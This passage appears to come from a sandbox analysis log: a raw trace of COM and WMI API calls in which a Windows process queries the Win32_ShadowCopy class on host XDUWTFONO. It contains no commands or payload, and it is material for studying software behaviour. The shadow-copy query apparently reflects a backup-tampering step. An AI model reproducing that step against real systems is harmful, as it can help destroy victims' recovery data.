[4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cdc0 | out: ppvObject=0x1c90cdc0*=0x1be453a0) returned 0x0 [0108.830] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x2 [0108.830] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x1 [0108.831] CoGetContextToken (in: pToken=0x1c90cee0 | out: pToken=0x1c90cee0) returned 0x0 [0108.831] CoGetContextToken (in: pToken=0x1c90ce20 | out: pToken=0x1c90ce20) returned 0x0 [0108.831] WbemDefPath:IUnknown:AddRef (This=0x1be453a0) returned 0x2 [0108.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be453a0, riid=0x1c90cf60*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cf40 | out: ppvObject=0x1c90cf40*=0x1be453a0) returned 0x0 [0108.831] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x2 [0108.831] WbemDefPath:IUnknown:AddRef (This=0x1be453a0) returned 0x3 [0108.831] WbemDefPath:IWbemPath:SetText (This=0x1be453a0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2") returned 0x0 [0108.831] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x2 [0108.831] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be453a0, puCount=0x1c90d1e0 | out: puCount=0x1c90d1e0*=0x2) returned 0x0 [0108.831] WbemDefPath:IWbemPath:GetText (in: This=0x1be453a0, lFlags=4, puBuffLength=0x1c90d1e0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d1e0*=0x17, pszText=0x0) returned 0x0 [0108.831] WbemDefPath:IWbemPath:GetText (in: This=0x1be453a0, lFlags=4, puBuffLength=0x1c90d1e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d1e0*=0x17, pszText="\\\\XDUWTFONO\\root\\cimv2") returned 0x0 [0108.833] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d1f0 | out: puCount=0x1c90d1f0*=0x2) returned 0x0 [0108.833] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d1f0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d1f0*=0x17, pszText=0x0) returned 0x0 [0108.833] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d1f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d1f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0108.837] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d1a0 | out: puCount=0x1c90d1a0*=0x2) returned 0x0 [0108.837] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d1a0*=0x17, pszText=0x0) returned 0x0 [0108.837] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0108.837] CoGetContextToken (in: pToken=0x1c90cf80 | out: pToken=0x1c90cf80) returned 0x0 [0108.837] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0108.837] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cb50 | out: ppvObject=0x1c90cb50*=0x1b92e6f0) returned 0x0 [0108.837] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0108.837] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0108.838] WbemDefPath:IWbemPath:GetText (in: This=0x1be44fd0, lFlags=2, puBuffLength=0x1c90d1b0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d1b0*=0x11, pszText=0x0) returned 0x0 [0108.838] WbemDefPath:IWbemPath:GetText (in: This=0x1be44fd0, lFlags=2, puBuffLength=0x1c90d1b0*=0x11, pszText="0000000000000000" | out: puBuffLength=0x1c90d1b0*=0x11, pszText="Win32_ShadowCopy") returned 0x0 [0108.853] IWbemServices:GetObject (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppObject=0x1c90d158*=0x0, ppCallResult=0x0 | out: ppObject=0x1c90d158*=0x1be45460, ppCallResult=0x0) returned 0x0 [0108.861] IWbemClassObject:Get (in: This=0x1be45460, wszName="__PATH", lFlags=0, pVal=0x1c90d130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d12c*=0, plFlavor=0x1c90d128*=0 | out: pVal=0x1c90d130*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d12c*=8, plFlavor=0x1c90d128*=64) returned 0x0 [0108.861] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ShadowCopy") returned 0x27 [0108.861] CoGetObjectContext (in: riid=0x1c90d078*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d070 | out: ppv=0x1c90d070*=0x142498) returned 0x0 [0108.861] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d090 | out: pAptType=0x1c90d090*=1) returned 0x0 [0108.861] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d198 | out: ppvObject=0x1c90d198*=0x0) returned 0x80004002 [0108.862] IUnknown:Release (This=0x142498) returned 0x1 [0108.862] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c700 | out: ppv=0x1c90c700*=0x1be41b00) returned 0x0 [0108.862] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41b00, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c410 | out: ppvObject=0x1c90c410*=0x0) returned 0x80004002 [0108.862] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41b00, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c3f8 | out: ppvObject=0x1c90c3f8*=0x1be457d0) returned 0x0 [0108.862] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be457d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c300 | out: ppvObject=0x1c90c300*=0x1be457d0) returned 0x0 [0108.863] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be457d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c380 | out: ppvObject=0x1c90c380*=0x0) returned 0x80004002 [0108.863] WbemDefPath:IUnknown:AddRef (This=0x1be457d0) returned 0x3 [0108.863] CoGetContextToken (in: pToken=0x1c90bfd0 | out: pToken=0x1c90bfd0) returned 0x0 [0108.863] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be457d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bf90 | out: ppvObject=0x1c90bf90*=0x1b92d260) returned 0x0 [0108.863] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92d260, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90bfc0 | out: pCid=0x1c90bfc0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.863] WbemDefPath:IUnknown:Release (This=0x1b92d260) returned 0x3 [0108.863] CoGetContextToken (in: pToken=0x1c90bfa0 | out: pToken=0x1c90bfa0) returned 0x0 [0108.863] WbemDefPath:IUnknown:AddRef (This=0x1be457d0) returned 0x4 [0108.863] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be457d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c0b8 | out: ppvObject=0x1c90c0b8*=0x0) returned 0x80004002 [0108.863] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x3 [0108.863] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x2 [0108.863] WbemDefPath:IUnknown:Release (This=0x1be41b00) returned 0x0 [0108.863] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x1 [0108.863] CoGetContextToken (in: pToken=0x1c90ccd0 | out: pToken=0x1c90ccd0) returned 0x0 [0108.863] CoGetContextToken (in: pToken=0x1c90cc10 | out: pToken=0x1c90cc10) returned 0x0 [0108.863] WbemDefPath:IUnknown:AddRef (This=0x1be457d0) returned 0x2 [0108.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be457d0, riid=0x1c90cd50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd30 | out: ppvObject=0x1c90cd30*=0x1be457d0) returned 0x0 [0108.864] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x2 [0108.864] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x1 [0108.864] CoGetContextToken (in: pToken=0x1c90ce50 | out: pToken=0x1c90ce50) returned 0x0 [0108.864] CoGetContextToken (in: pToken=0x1c90cd90 | out: pToken=0x1c90cd90) returned 0x0 [0108.864] WbemDefPath:IUnknown:AddRef (This=0x1be457d0) returned 0x2 [0108.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be457d0, riid=0x1c90ced0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1be457d0) returned 0x0 [0108.864] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x2 [0108.864] WbemDefPath:IUnknown:AddRef (This=0x1be457d0) returned 0x3 [0108.864] WbemDefPath:IWbemPath:SetText (This=0x1be457d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ShadowCopy") returned 0x0 [0108.864] WbemDefPath:IUnknown:Release (This=0x1be457d0) returned 0x2 [0108.864] IWbemClassObject:Get (in: This=0x1be45460, wszName="__SERVER", lFlags=0, pVal=0x1c90d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d19c*=0, plFlavor=0x1c90d198*=0 | out: pVal=0x1c90d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c90d19c*=8, plFlavor=0x1c90d198*=64) returned 0x0 [0108.864] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0108.864] IWbemClassObject:Get (in: This=0x1be45460, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d19c*=8, plFlavor=0x1c90d198*=64 | out: pVal=0x1c90d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c90d19c*=8, plFlavor=0x1c90d198*=64) returned 0x0 [0108.865] SysStringLen (param_1="ROOT\\cimv2") returned 0xa [0108.865] IWbemClassObject:Get (in: This=0x1be45460, wszName="__CLASS", lFlags=0, pVal=0x1c90d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d19c*=8, plFlavor=0x1c90d198*=64 | out: pVal=0x1c90d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d19c*=8, plFlavor=0x1c90d198*=64) returned 0x0 [0108.865] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0108.865] CoGetObjectContext (in: riid=0x1c90d048*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d040 | out: ppv=0x1c90d040*=0x142498) returned 0x0 [0108.865] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d060 | out: pAptType=0x1c90d060*=1) returned 0x0 [0108.865] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d168 | out: ppvObject=0x1c90d168*=0x0) returned 0x80004002 [0108.865] IUnknown:Release (This=0x142498) returned 0x1 [0108.865] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c6d0 | out: ppv=0x1c90c6d0*=0x1be41ba0) returned 0x0 [0108.865] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41ba0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c3e0 | out: ppvObject=0x1c90c3e0*=0x0) returned 0x80004002 [0108.866] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41ba0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c3c8 | out: ppvObject=0x1c90c3c8*=0x1be49030) returned 0x0 [0108.866] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be49030, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c2d0 | out: ppvObject=0x1c90c2d0*=0x1be49030) returned 0x0 [0108.866] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be49030, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c350 | out: ppvObject=0x1c90c350*=0x0) returned 0x80004002 [0108.866] WbemDefPath:IUnknown:AddRef (This=0x1be49030) returned 0x3 [0108.866] CoGetContextToken (in: pToken=0x1c90bfa0 | out: pToken=0x1c90bfa0) returned 0x0 [0108.866] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be49030, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bf60 | out: ppvObject=0x1c90bf60*=0x1b929ce0) returned 0x0 [0108.866] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b929ce0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90bf90 | out: pCid=0x1c90bf90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.866] WbemDefPath:IUnknown:Release (This=0x1b929ce0) returned 0x3 [0108.866] CoGetContextToken (in: pToken=0x1c90bf70 | out: pToken=0x1c90bf70) returned 0x0 [0108.866] WbemDefPath:IUnknown:AddRef (This=0x1be49030) returned 0x4 [0108.866] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be49030, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c088 | out: ppvObject=0x1c90c088*=0x0) returned 0x80004002 [0108.866] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x3 [0108.866] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x2 [0108.866] WbemDefPath:IUnknown:Release (This=0x1be41ba0) returned 0x0 [0108.867] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x1 [0108.867] CoGetContextToken (in: pToken=0x1c90cca0 | out: pToken=0x1c90cca0) returned 0x0 [0108.867] CoGetContextToken (in: pToken=0x1c90cbe0 | out: pToken=0x1c90cbe0) returned 0x0 [0108.867] WbemDefPath:IUnknown:AddRef (This=0x1be49030) returned 0x2 [0108.867] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be49030, riid=0x1c90cd20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd00 | out: ppvObject=0x1c90cd00*=0x1be49030) returned 0x0 [0108.867] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x2 [0108.867] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x1 [0108.867] CoGetContextToken (in: pToken=0x1c90ce20 | out: pToken=0x1c90ce20) returned 0x0 [0108.867] CoGetContextToken (in: pToken=0x1c90cd60 | out: pToken=0x1c90cd60) returned 0x0 [0108.867] WbemDefPath:IUnknown:AddRef (This=0x1be49030) returned 0x2 [0108.867] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be49030, riid=0x1c90cea0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90ce80 | out: ppvObject=0x1c90ce80*=0x1be49030) returned 0x0 [0108.867] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x2 [0108.867] WbemDefPath:IUnknown:AddRef (This=0x1be49030) returned 0x3 [0108.867] WbemDefPath:IWbemPath:SetText (This=0x1be49030, uMode=0x4, pszPath="") returned 0x0 [0108.867] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x2 [0108.867] CoGetObjectContext (in: riid=0x1c90d048*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d040 | out: ppv=0x1c90d040*=0x142498) returned 0x0 [0108.867] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d060 | out: pAptType=0x1c90d060*=1) returned 0x0 [0108.868] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d168 | out: ppvObject=0x1c90d168*=0x0) returned 0x80004002 [0108.868] IUnknown:Release (This=0x142498) returned 0x1 [0108.868] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c6d0 | out: ppv=0x1c90c6d0*=0x1be41ba0) returned 0x0 [0108.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41ba0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c3e0 | out: ppvObject=0x1c90c3e0*=0x0) returned 0x80004002 [0108.868] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41ba0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c3c8 | out: ppvObject=0x1c90c3c8*=0x1be490f0) returned 0x0 [0108.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be490f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c2d0 | out: ppvObject=0x1c90c2d0*=0x1be490f0) returned 0x0 [0108.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be490f0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c350 | out: ppvObject=0x1c90c350*=0x0) returned 0x80004002 [0108.868] WbemDefPath:IUnknown:AddRef (This=0x1be490f0) returned 0x3 [0108.868] CoGetContextToken (in: pToken=0x1c90bfa0 | out: pToken=0x1c90bfa0) returned 0x0 [0108.868] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be490f0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bf60 | out: ppvObject=0x1c90bf60*=0x1b929d20) returned 0x0 [0108.868] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b929d20, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90bf90 | out: pCid=0x1c90bf90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.869] WbemDefPath:IUnknown:Release (This=0x1b929d20) returned 0x3 [0108.869] CoGetContextToken (in: pToken=0x1c90bf70 | out: pToken=0x1c90bf70) returned 0x0 [0108.869] WbemDefPath:IUnknown:AddRef (This=0x1be490f0) returned 0x4 [0108.869] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be490f0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c088 | out: ppvObject=0x1c90c088*=0x0) returned 0x80004002 [0108.869] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x3 [0108.869] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x2 [0108.869] WbemDefPath:IUnknown:Release (This=0x1be41ba0) returned 0x0 [0108.869] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x1 [0108.869] CoGetContextToken (in: pToken=0x1c90cca0 | out: pToken=0x1c90cca0) returned 0x0 [0108.869] CoGetContextToken (in: pToken=0x1c90cbe0 | out: pToken=0x1c90cbe0) returned 0x0 [0108.869] WbemDefPath:IUnknown:AddRef (This=0x1be490f0) returned 0x2 [0108.869] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be490f0, riid=0x1c90cd20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd00 | out: ppvObject=0x1c90cd00*=0x1be490f0) returned 0x0 [0108.869] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x2 [0108.869] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x1 [0108.869] CoGetContextToken (in: pToken=0x1c90ce20 | out: pToken=0x1c90ce20) returned 0x0 [0108.869] CoGetContextToken (in: pToken=0x1c90cd60 | out: pToken=0x1c90cd60) returned 0x0 [0108.869] WbemDefPath:IUnknown:AddRef (This=0x1be490f0) returned 0x2 [0108.870] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be490f0, riid=0x1c90cea0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90ce80 | out: ppvObject=0x1c90ce80*=0x1be490f0) returned 0x0 [0108.870] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x2 [0108.870] WbemDefPath:IUnknown:AddRef (This=0x1be490f0) returned 0x3 [0108.870] WbemDefPath:IWbemPath:SetText (This=0x1be490f0, uMode=0x4, pszPath="") returned 0x0 [0108.870] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x2 [0108.870] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be490f0, puCount=0x1c90d140 | out: puCount=0x1c90d140*=0x0) returned 0x0 [0108.870] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be49030, puCount=0x1c90d140 | out: puCount=0x1c90d140*=0x0) returned 0x0 [0108.870] WbemDefPath:IWbemPath:GetClassName (in: This=0x1be490f0, 